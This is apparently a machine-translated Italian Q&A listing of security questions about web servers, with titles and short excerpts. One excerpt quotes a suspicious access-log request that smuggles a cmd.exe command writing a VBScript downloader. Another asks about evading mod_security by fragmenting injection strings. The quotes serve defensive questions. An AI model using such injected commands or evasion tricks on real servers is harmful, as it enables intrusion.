Domande con tag 'webserver'

domande con tag
2
risposte

Quali sono i pericoli delle risorse hot-link da altri siti web

Diciamo che c'è una situazione in cui site a collega direttamente un file di font cioè https://www.example.com/FONT.woff2 da site b . Sarebbe possibile che qualcuno effettui una regola di riscrittura degli URL per indirizz...
posta 28.09.2017 - 08:30
2
risposte

ip-frammentation e mod_security?

è possibile usare ip-fragmenation (ad esempio con fragroute) per eludere mod_security? l'idea sarebbe quella di suddividere una stringa sql-injection o xss in piccoli pezzi in modo che non venga riconosciuta.     
posta 04.05.2011 - 02:23
2
risposte

richiesta HTTP sospetta nei log

Ho trovato questa richiesta nel mio access.log di Ubuntu 14.04 apache2: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHT...
posta 26.09.2014 - 04:19
3
risposte

Le persone obietteranno il mio sito web solo perché utilizzo Google Analytics, +1 o FB Connect?

Ci sono persone che si rifiuteranno di utilizzare un sito web solo perché quel sito invia informazioni del browser a Google Analytics? Il pulsante +1 potrebbe essere una bandiera rossa? Dovrei aspettarmi che ci sarebbero pensieri simili su...
posta 18.03.2012 - 15:00
1
risposta

cartella e permesso di condivisione di host

Ho un sito Web con una società di webhost. Ho scritto una piccola applicazione php / mysql - nessun caricamento di file, solo la gestione dei dati dal DB e la creazione di pdf con TCPDF. Ci sono cartelle come css e js ma nient'altro. Poiché h...
posta 14.09.2011 - 11:25
2
risposte

Devo pubblicare indirizzi IP che provano a forzare il mio server web privato?

Eticamente e legalmente, sono autorizzato a pubblicare indirizzi IP che hanno provato a forzare il mio server LAMP? È un sito / blog personale che viene brutalmente forzato e vorrei pubblicarli sul mio sito per fare un post interessante. Vorr...
posta 25.03.2017 - 17:20
1
risposta

Ci sono implicazioni sulla sicurezza nella creazione di una chiave SSH per l'utente root?

Ho scritto uno script di installazione su un server per configurare rapidamente nuovi siti nella directory / srv. Ha bisogno di fare un git clone , e deve essere eseguito tramite sudo per avere i permessi per fare tutto ciò che deve far...
posta 18.05.2015 - 19:25
5
risposte

Qual è una tipica risposta dal server web per la richiesta POST?

Il mio server web restituisce 200 OK dopo aver inviato una richiesta POST, ma non sembra essere una buona idea secondo un team di sicurezza. Dovrebbe restituire un "Oggetto spostato" di 302, in modo da evitare la memorizzazione nella cache de...
posta 15.10.2015 - 21:20
3
risposte

E 'possibile elencare una cartella dal mio server web se ho un index.html vuoto nella cartella principale?

Ho un piccolo server web di mangusta installato sulla mia macchina. Ho un index.html vuoto nella directory root. Voglio poter condividere link con persone che conosco, creando una cartella simile a questa: 0gzzfiz4pf80mn8dw1k3 Quindi il mi...
posta 31.01.2013 - 17:45
2
risposte

Alcune domande sulla distribuzione dei test di penetrazione Backtrack 5

Conosco solo le basi del backtrack e voglio fare alcune domande al riguardo: Puoi attaccare un server ftp usando backtrack? un server di posta elettronica? Ho un server privato virtuale Centos e il backtrack è sul mio PC, Posso cambiare...
posta 03.10.2011 - 19:43